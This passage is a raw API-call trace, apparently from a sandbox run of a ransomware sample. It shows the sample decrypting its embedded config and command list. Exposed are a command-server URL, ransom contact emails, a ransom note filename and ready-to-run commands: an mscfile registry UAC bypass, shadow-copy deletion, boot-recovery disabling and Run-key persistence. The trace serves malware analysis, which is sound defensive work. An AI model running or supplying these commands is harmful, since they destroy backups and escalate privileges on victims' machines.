lpLCData=0x12f7d8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0117.103] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x1e, lpLCData=0x12fa18, cchData=2 | out: lpLCData=":") returned 2 [0117.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f820, cchData=256 | out: lpLCData="AM") returned 3 [0117.104] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f820, cchData=256 | out: lpLCData="PM") returned 3 [0117.104] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0117.104] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0117.104] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0117.104] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0117.104] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77380000 [0117.106] GetProcAddress (hModule=0x77380000, lpProcName="WSAIoctl") returned 0x77382fe7 [0117.106] GetProcAddress (hModule=0x77380000, lpProcName="__WSAFDIsSet") returned 0x77386a8a [0117.106] GetProcAddress (hModule=0x77380000, lpProcName="closesocket") returned 0x77383918 [0117.106] GetProcAddress (hModule=0x77380000, lpProcName="ioctlsocket") returned 0x77383084 [0117.106] GetProcAddress (hModule=0x77380000, lpProcName="WSAGetLastError") returned 0x773837ad [0117.106] GetProcAddress (hModule=0x77380000, lpProcName="WSAStartup") returned 0x77383ab2 [0117.106] GetProcAddress (hModule=0x77380000, lpProcName="WSACleanup") returned 0x77383c5f [0117.106] GetProcAddress (hModule=0x77380000, lpProcName="accept") returned 0x773868b6 [0117.106] GetProcAddress (hModule=0x77380000, lpProcName="bind") returned 0x77384582 [0117.106] GetProcAddress (hModule=0x77380000, lpProcName="connect") returned 0x77386bdd [0117.106] GetProcAddress (hModule=0x77380000, lpProcName="getpeername") returned 0x77387147 [0117.106] GetProcAddress (hModule=0x77380000, lpProcName="getsockname") returned 0x773830af [0117.106] GetProcAddress 
(hModule=0x77380000, lpProcName="getsockopt") returned 0x7738737d [0117.106] GetProcAddress (hModule=0x77380000, lpProcName="htonl") returned 0x77382d57 [0117.107] GetProcAddress (hModule=0x77380000, lpProcName="htons") returned 0x77382d8b [0117.107] GetProcAddress (hModule=0x77380000, lpProcName="inet_addr") returned 0x7738311b [0117.107] GetProcAddress (hModule=0x77380000, lpProcName="inet_ntoa") returned 0x7738b131 [0117.107] GetProcAddress (hModule=0x77380000, lpProcName="listen") returned 0x7738b001 [0117.107] GetProcAddress (hModule=0x77380000, lpProcName="ntohl") returned 0x77382d57 [0117.107] GetProcAddress (hModule=0x77380000, lpProcName="ntohs") returned 0x77382d8b [0117.107] GetProcAddress (hModule=0x77380000, lpProcName="recv") returned 0x77386b0e [0117.107] GetProcAddress (hModule=0x77380000, lpProcName="recvfrom") returned 0x7738b6dc [0117.107] GetProcAddress (hModule=0x77380000, lpProcName="select") returned 0x77386989 [0117.107] GetProcAddress (hModule=0x77380000, lpProcName="send") returned 0x77386f01 [0117.107] GetProcAddress (hModule=0x77380000, lpProcName="sendto") returned 0x773834b5 [0117.107] GetProcAddress (hModule=0x77380000, lpProcName="setsockopt") returned 0x773841b6 [0117.107] GetProcAddress (hModule=0x77380000, lpProcName="shutdown") returned 0x7738449d [0117.107] GetProcAddress (hModule=0x77380000, lpProcName="socket") returned 0x77383eb8 [0117.108] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyaddr") returned 0x77396c01 [0117.108] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyname") returned 0x77397673 [0117.108] GetProcAddress (hModule=0x77380000, lpProcName="getprotobyname") returned 0x773968b3 [0117.108] GetProcAddress (hModule=0x77380000, lpProcName="getprotobynumber") returned 0x773967c4 [0117.108] GetProcAddress (hModule=0x77380000, lpProcName="getservbyname") returned 0x77396ef3 [0117.108] GetProcAddress (hModule=0x77380000, lpProcName="getservbyport") returned 0x77396d62 [0117.108] GetProcAddress 
(hModule=0x77380000, lpProcName="gethostname") returned 0x7738a05b [0117.108] GetProcAddress (hModule=0x77380000, lpProcName="getaddrinfo") returned 0x77384296 [0117.108] GetProcAddress (hModule=0x77380000, lpProcName="freeaddrinfo") returned 0x77384b1b [0117.108] GetProcAddress (hModule=0x77380000, lpProcName="getnameinfo") returned 0x773867b7 [0117.108] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4e9ec0 | out: lpWSAData=0x4e9ec0) returned 0 [0117.114] GetACP () returned 0x4e4 [0117.114] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fc28 | out: lpCPInfo=0x12fc28) returned 1 [0117.114] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa5c, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe")) returned 0x30 [0117.114] GetTickCount () returned 0x27c7f [0117.115] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc38 | out: lpPerformanceCount=0x12fc38*=17390375616) returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4a\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x77\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x68\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x56\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, 
dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x48\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x70\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x72\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x32\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x7a\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x66\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x51\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4c\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: 
lpWideCharStr="\x55\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x36\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x49\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x73\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0117.115] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0117.115] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0117.115] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0117.115] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0117.115] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x51c308 [0117.115] LoadResource (hModule=0x400000, hResInfo=0x51c308) returned 0x50d55c [0117.115] SizeofResource (hModule=0x400000, hResInfo=0x51c308) returned 0xef [0117.115] LockResource (hResData=0x50d55c) returned 0x50d55c [0117.116] FreeResource (hResData=0x50d55c) returned 0 [0117.116] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0117.116] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0117.116] 
SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0117.116] LockResource (hResData=0x50d64c) returned 0x50d64c [0117.116] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x12fa3c | out: lpCPInfo=0x12fa3c) returned 1 [0117.116] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x634f60, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0117.116] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x634f60, cbMultiByte=38, lpWideCharStr=0x62de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0117.116] FreeResource (hResData=0x50d64c) returned 0 [0117.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0117.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x634f64, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0117.116] GetCurrentThreadId () returned 0xe60 [0117.116] GetCurrentThreadId () returned 0xe60 [0117.116] GetCurrentThreadId () returned 0xe60 [0117.116] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x5ecd18, cbMultiByte=239, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 239 [0117.116] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x5ecd18, cbMultiByte=239, lpWideCharStr=0x5f2e7c, cchWideChar=239 | out: 
lpWideCharStr="13StarterProcessMutex4\r\n24MainProcessMutex5\r\n35Brother1ProcessMutex6\r\n46Brother2ProcessMutex7\r\n300\r\nCOSLb0cVd9bCx1vp\r\nhttp://statcs.s76.r53.com.ua\r\n131072\r\nbluetablet9643@yahoo.com\r\ndecodedecode@yandex.ru\r\nBl0cked-ReadMe.rtf\r\ndesktop.ini\r\n") returned 239 [0117.116] GetCurrentThreadId () returned 0xe60 [0117.116] GetCurrentThreadId () returned 0xe60 [0117.116] GetCurrentThreadId () returned 0xe60 [0117.116] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0117.116] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x5e399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5") returned 0x11 [0117.117] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x5e399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp") returned 0x24 [0117.117] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x5e39b4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 1 [0117.119] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x5e39b4, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local") returned 1 [0117.120] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x5e39b4, csidl=7, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0117.121] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x5e39b4, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0117.121] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x5e39b4, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0117.122] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x5e39b4, csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0117.123] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x5e39b4, 
csidl=32, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0117.124] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x5e39b4, csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0117.124] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x5e39b4, csidl=40, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5") returned 1 [0117.126] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x5cc63c, nSize=0x8000 | out: lpDst="CRH2YWU7") returned 0x9 [0117.126] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x5cc63c, nSize=0x8000 | out: lpDst="EEBsYm5") returned 0x8 [0117.126] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x5cc63c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x21 [0117.126] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x5cc63c, nSize=0x8000 | out: lpDst="C:\\ProgramData") returned 0xf [0117.126] FindResourceW (hModule=0x400000, lpName="CMDS", lpType=0xa) returned 0x51c380 [0117.126] LoadResource (hModule=0x400000, hResInfo=0x51c380) returned 0x50d72c [0117.126] SizeofResource (hModule=0x400000, hResInfo=0x51c380) returned 0x582 [0117.126] LockResource (hResData=0x50d72c) returned 0x50d72c [0117.126] FreeResource (hResData=0x50d72c) returned 0 [0117.126] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0117.126] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0117.126] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0117.126] LockResource (hResData=0x50d64c) returned 0x50d64c [0117.126] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x635008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0117.126] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x635008, cbMultiByte=38, lpWideCharStr=0x62deac, cchWideChar=38 | out: 
lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0117.126] FreeResource (hResData=0x50d64c) returned 0 [0117.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0117.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x63500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0117.126] GetCurrentThreadId () returned 0xe60 [0117.126] GetCurrentThreadId () returned 0xe60 [0117.126] GetCurrentThreadId () returned 0xe60 [0117.126] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x5ce688, cbMultiByte=1410, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1410 [0117.126] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x5ce688, cbMultiByte=1410, lpWideCharStr=0x5e9afc, cchWideChar=1410 | out: lpWideCharStr="%CD%\r\n%SystemRoot%\\system32\\cmd.exe\r\n%SystemRoot%\\system32\\shell32.dll\r\nreg copy \"HKCR\\mscfile\" \"HKCU\\Software\\Classes\\mscfile\" /s /f && reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"[MAIN_PATH]\" /f && \"[AE_PATH]\" & reg delete \"HKCU\\Software\\Classes\\mscfile\" /f\r\nprocess call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\nvssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nCACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"\r\nreg add 
\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"[HTA_NAME]\" /t REG_SZ /f /d \"\\\"[HTA_PATH]\"\\\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]\r\nattrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"\r\nexplorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"\r\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"\r\ntaskkill /f /IM explorer.exe && start explorer.exe\r\n") returned 1410 [0117.127] GetCurrentThreadId () returned 0xe60 [0117.127] GetCurrentThreadId () returned 0xe60 [0117.127] GetCurrentThreadId () returned 0xe60 [0117.127] GetCurrentThread () returned 0xfffffffe [0117.127] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0x0) returned 0 [0117.127] GetLastError () returned 0x3f0 [0117.127] GetCurrentProcess () returned 0xffffffff [0117.127] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0xb8) returned 1 [0117.127] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x2, TokenInformation=0x5e7ae0, TokenInformationLength=0x400, ReturnLength=0x12fc60 | out: TokenInformation=0x5e7ae0, ReturnLength=0x12fc60) returned 1 [0117.127] CloseHandle (hObject=0xb8) returned 1 [0117.127] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e3754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12fc5c | out: pSid=0x12fc5c*=0x726438*(Revision=0x1, SubAuthorityCount=0x2, 
IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0117.127] EqualSid (pSid1=0x726438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x5e7b44*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0117.127] EqualSid (pSid1=0x726438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x5e7b60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0117.127] EqualSid (pSid1=0x726438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x5e7b6c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0117.127] GetCurrentProcess () returned 0xffffffff [0117.127] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc68 | out: TokenHandle=0x12fc68*=0xb8) returned 1 [0117.127] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fc64 | out: TokenInformation=0x0, ReturnLength=0x12fc64) returned 0 [0117.127] GetLastError () returned 0x7a [0117.127] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x7276d8 [0117.127] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x7276d8, TokenInformationLength=0x14, ReturnLength=0x12fc64 | out: TokenInformation=0x7276d8, ReturnLength=0x12fc64) 
returned 1 [0117.127] GetSidSubAuthorityCount (pSid=0x7276e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x7276e1 [0117.127] GetSidSubAuthority (pSid=0x7276e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x7276e8 [0117.127] LocalFree (hMem=0x7276d8) returned 0x0 [0117.127] CloseHandle (hObject=0xb8) returned 1 [0117.127] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0117.127] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0117.128] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0117.128] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0117.128] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0117.128] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0117.128] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0117.128] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0117.128] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0117.128] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0117.128] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0117.128] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0117.129] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0117.129] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0117.129] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0117.129] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0117.129] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0117.129] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0117.129] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0117.129] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0117.129] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0117.129] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0117.129] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0117.130] GetDriveTypeW 
(lpRootPathName="C:\\") returned 0x3 [0117.130] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x51c420 [0117.130] LoadResource (hModule=0x400000, hResInfo=0x51c420) returned 0x516824 [0117.130] SizeofResource (hModule=0x400000, hResInfo=0x51c420) returned 0x267 [0117.130] LockResource (hResData=0x516824) returned 0x516824 [0117.130] FreeResource (hResData=0x516824) returned 0 [0117.130] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0117.130] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0117.130] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0117.130] LockResource (hResData=0x50d64c) returned 0x50d64c [0117.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x635008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0117.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, 